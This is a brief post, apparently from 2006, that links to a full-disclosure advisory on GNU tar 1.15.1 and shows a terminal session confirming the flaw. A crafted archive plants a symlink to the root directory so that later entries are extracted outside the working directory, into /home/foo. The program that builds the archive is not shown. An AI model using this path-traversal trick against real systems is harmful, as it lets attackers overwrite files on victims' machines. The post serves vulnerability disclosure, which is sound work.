Just when you thought you were safe...

http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html

Have tested this and it works as described:

nathan@holly /tmp $ tar --version
tar (GNU tar) 1.15.1
nathan@holly /tmp $ ~/tmp/tarxyz > foo.tar
nathan@holly /tmp $ mkdir -p xyz/home/foo
nathan@holly /tmp $ echo "Hello" > xyz/home/foo/hello.txt
nathan@holly /tmp $ tar -rf foo.tar xyz/home/foo
nathan@holly /tmp $ rootdo mkdir /home/foo
nathan@holly /tmp $ rootdo chown nathan /home/foo
nathan@holly /tmp $ rm -rf xyz
nathan@holly /tmp $ tar -xf foo.tar
nathan@holly /tmp $ ls -l xyz
lrwxrwxrwx 1 nathan users 1 Nov 22 00:03 xyz -> /
nathan@holly /tmp $ cat /home/foo/hello.txt
Hello
nathan@holly /tmp $